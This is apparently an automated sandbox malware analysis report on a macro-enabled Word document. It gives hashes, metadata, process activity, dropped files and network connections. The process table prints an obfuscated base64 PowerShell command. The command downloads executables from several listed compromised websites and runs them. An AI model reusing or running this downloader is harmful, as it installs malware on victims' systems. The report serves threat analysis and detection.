Malware analysis Inf_H78_K498109.doc Malicious activity

Add for printing

File name:	Inf_H78_K498109.doc
Full analysis:	https://app.any.run/tasks/39be3cd2-b047-4ba1-a05d-1bda0c31143f
Verdict:	Malicious activity
Analysis date:	May 24, 2019, 19:33:19
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	macros macros-on-open generated-doc
Indicators:
MIME:	application/msword
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: e-commerce, Subject: Tennessee, Author: Christa Macejkovic, Comments: Metrics Lebanese Pound, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 24 14:52:00 2019, Last Saved Time/Date: Fri May 24 14:52:00 2019, Number of Pages: 1, Number of Words: 15, Number of Characters: 91, Security: 0
MD5:	AECD0FDA2F4B93F316973850222EB41C
SHA1:	AF7C8C2628D0C8996C2F4948B9A34A1F2BA1DC39
SHA256:	9D8C5EA51A8334C46E06044D34A04BAD5BDA69D3E192415BA9855541F4D0ED58
SSDEEP:	1536:PDMeOY5C6OJsdBpZW3+a9aCM0YvL3ozpycr25TjzFtF:P4eOY5CTsdAsCMYv0TjfF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: on
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (73.0.3683.75)
Google Update Helper (1.3.33.23)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.6.1 (4.6.01055)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
No malicious indicators.
SUSPICIOUS
- Creates files in the user directory
  - powershell.exe (PID: 3744)
- PowerShell script executed
  - powershell.exe (PID: 3744)
- Executed via WMI
  - powershell.exe (PID: 3744)
INFO
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 2948)
- Creates files in the user directory
  - WINWORD.EXE (PID: 2948)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.doc	\|	Microsoft Word document (54.2)
.doc	\|	Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen:	32
CompObjUserType:	Microsoft Word 97-2003 Document
Title:	e-commerce
Subject:	Tennessee
Author:	Christa Macejkovic
Keywords:	-
Comments:	Metrics Lebanese Pound
Template:	Normal.dotm
LastModifiedBy:	-
RevisionNumber:	1
Software:	Microsoft Office Word
TotalEditTime:	-
CreateDate:	2019:05:24 13:52:00
ModifyDate:	2019:05:24 13:52:00
Pages:	1
Words:	15
Characters:	91
Security:	None
CodePage:	Windows Latin 1 (Western European)
Company:	Bins, Welch and Corkery
Lines:	1
Paragraphs:	1
CharCountWithSpaces:	105
AppVersion:	16
ScaleCrop:	No
LinksUpToDate:	No
SharedDoc:	No
HyperlinksChanged:	No
TitleOfParts:	-
HeadingPairs:	Title 1
Manager:	Hansen

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
2948	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\Inf_H78_K498109.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
3744	powershell -nop -e JABJADYAWQBLAHUAdgA9ACcAVwBaAEcAegB3AFUAVgBwACcAOwAkAGwAUwBvAHcAcQBVAG4AIAA9ACAAJwA1ADIAMgAnADsAJABGAHAATwA1AFkAZgBZAD0AJwBwAGkAaQBoAEMAOQAnADsAJABOAGgANwBZAHIAOAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAbABTAG8AdwBxAFUAbgArACcALgBlAHgAZQAnADsAJABXADUAagB3ADgAaQA9ACcAegByADgAMABUAEkASwAnADsAJABTAGoAaQBrAG4ARQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQAYAAuAGAAdwBFAEIAYwBsAGkAZQBuAHQAOwAkAHYAMQBiADAARwAyAD0AJwBoAHQAdABwAHMAOgAvAC8AZwB1AGEAbgBsAGEAbgBjAG0ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADkAMAAwAGUAeQAwADEAOQA3ADMAOAAvAEAAaAB0AHQAcAA6AC8ALwBwAG8AdwBlAHIAYgBvAHgAdAByAGEAeQBzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwA4ADYAMgA4ADQALwBAAGgAdAB0AHAAOgAvAC8AcwBlAHYAYQBzAGgAcgBhAG0AbQBpAHQAaABhAGwAaQAuAGMAbwBtAC8AdAB1AGsAdwByAC8AaABqADcALwBAAGgAdAB0AHAAOgAvAC8AYQBwAHIAaQBnAGgAdABzAC4AYwBvAG0ALwBhAGIAbwB1AHQALwByAG0AdAB6AHUAMwAxADgALwBAAGgAdAB0AHAAOgAvAC8AYgAtAHMAdAB5AGwAZQBzAC4AbgBlAHQALwBpAG0AZwAvAHEAagBkAGwAeABvADEANQA3ADEAMQAvACcALgBTAFAAbABJAFQAKAAnAEAAJwApADsAJABsAHAANwBCAF8AcQA9ACcAdwBHADMAMwBqAHYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAE0ANABLADMAUgBCAE8AIABpAG4AIAAkAHYAMQBiADAARwAyACkAewB0AHIAeQB7ACQAUwBqAGkAawBuAEUALgBkAE8AVwBOAEwAbwBBAGQARgBJAEwAZQAoACQATQA0AEsAMwBSAEIATwAsACAAJABOAGgANwBZAHIAOAApADsAJABCAFAAbgAyAHcASgBLAD0AJwBXAHcAYwBrAHMAcABZACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQATgBoADcAWQByADgAKQAuAGwARQBOAGcAdABIACAALQBnAGUAIAAzADIAMAAyADIAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABBAHIAVAAoACQATgBoADcAWQByADgAKQA7ACQAUAA3AFMAYgBPAEsAPQAnAFUAWQBxAFkAOABJAGYAUgAnADsAYgByAGUAYQBrADsAJABGAFQAagBmADkAcABqAD0AJwBqAFEAYgBpAFEASABiAGoAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAcABaAHEATgBMAHoAawBxAD0AJwBRAEUAYQB2ADMAZgBKAHYAJwA=	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		wmiprvse.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Add for printing

Total events

1 604

Read events

1 125

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2948	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVRE4E0.tmp.cvr		—
		MD5:—	SHA256:—
3744	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TZ7SLYJ6MNLS3W5RIF1R.temp		—
		MD5:—	SHA256:—
2948	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Inf_H78_K498109.doc.LNK		lnk
		MD5:5F69EEE5412461028D98AFFBADD3F64B	SHA256:D6D8C4E20C2669086AD3C5EE5A46ADCC76EF87EDEC33C210A162556A1BBBA0C4
2948	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:A0D7235B4D50FB7CB8D5649C365834BC	SHA256:6664D025F0137CE35BCB828739B37400C1214A15AAEA959AB886930CDEB5417F
2948	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat		text
		MD5:230CC99B9E45B2D058B0B41D6197D27E	SHA256:54C718230B8ED4FC37558C9B3FDB04D7A3B272E84421792997B5B195C3199381
2948	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BB81B274.wmf		wmf
		MD5:8A3F08F559A807FE48A79666132029BC	SHA256:2FDCCBD269C987D238D3F70CEB5F70A2839E5B446AB12F173BA39CE8E8A6BBDA
2948	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1EC5DA7F.wmf		wmf
		MD5:D3EC1793D4D8AEBA5140496F57EC3E5D	SHA256:50290B55A68367D56BD843D65B88113A246C9CB5B45C6441EAE2490E60DD0D4A
2948	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\79DB283B.wmf		wmf
		MD5:60F596F6BEA9CABC42020693B3FEC751	SHA256:13C6FB9782639770EF18D941100D56B074C5FFD7D3125B9C108152EE19D96E01
2948	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd		tlb
		MD5:E4C7A8D4AF566896A6EA1996D14B3767	SHA256:C86FF7159A7921478903CF0C23E8E880DA00B960333B9F24D41A76C410515DEF
2948	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA39E4A2.wmf		wmf
		MD5:E09DF6D5690A6A1C7F22A6532095443A	SHA256:AC263CC854ED1A35601E55A9B5A36B2B1F27F00E65566F06F2B67C12BEDDD6BB

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
3744	powershell.exe	GET	404	59.106.19.44:80	http://aprights.com/about/rmtzu318/	JP	xml	345 b	suspicious
3744	powershell.exe	GET	404	166.62.28.118:80	http://sevashrammithali.com/tukwr/hj7/	US	xml	345 b	malicious
3744	powershell.exe	GET	404	94.130.52.106:80	http://powerboxtrays.com/wp-includes/86284/	DE	xml	345 b	suspicious
3744	powershell.exe	GET	404	202.181.97.13:80	http://b-styles.net/img/qjdlxo15711/	JP	xml	345 b	suspicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
3744	powershell.exe	119.3.105.255:443	guanlancm.com	—	CN	unknown
3744	powershell.exe	94.130.52.106:80	powerboxtrays.com	Hetzner Online GmbH	DE	suspicious
3744	powershell.exe	166.62.28.118:80	sevashrammithali.com	GoDaddy.com, LLC	US	malicious
3744	powershell.exe	59.106.19.44:80	aprights.com	SAKURA Internet Inc.	JP	suspicious
3744	powershell.exe	202.181.97.13:80	b-styles.net	SAKURA Internet Inc.	JP	suspicious

DNS requests

Domain	IP	Reputation
guanlancm.com	119.3.105.255	unknown
powerboxtrays.com	94.130.52.106	suspicious
sevashrammithali.com	166.62.28.118	malicious
aprights.com	59.106.19.44	suspicious
b-styles.net	202.181.97.13	unknown

Threats

No threats detected

Add for printing

No debug info

General Info

Inf_H78_K498109.doc

AECD0FDA2F4B93F316973850222EB41C

AF7C8C2628D0C8996C2F4948B9A34A1F2BA1DC39

9D8C5EA51A8334C46E06044D34A04BAD5BDA69D3E192415BA9855541F4D0ED58

1536:PDMeOY5C6OJsdBpZW3+a9aCM0YvL3ozpycr25TjzFtF:P4eOY5CTsdAsCMYv0TjfF

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

SUSPICIOUS

Creates files in the user directory

PowerShell script executed

Executed via WMI

INFO

Reads Microsoft Office registry keys

Creates files in the user directory

Malware configuration

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings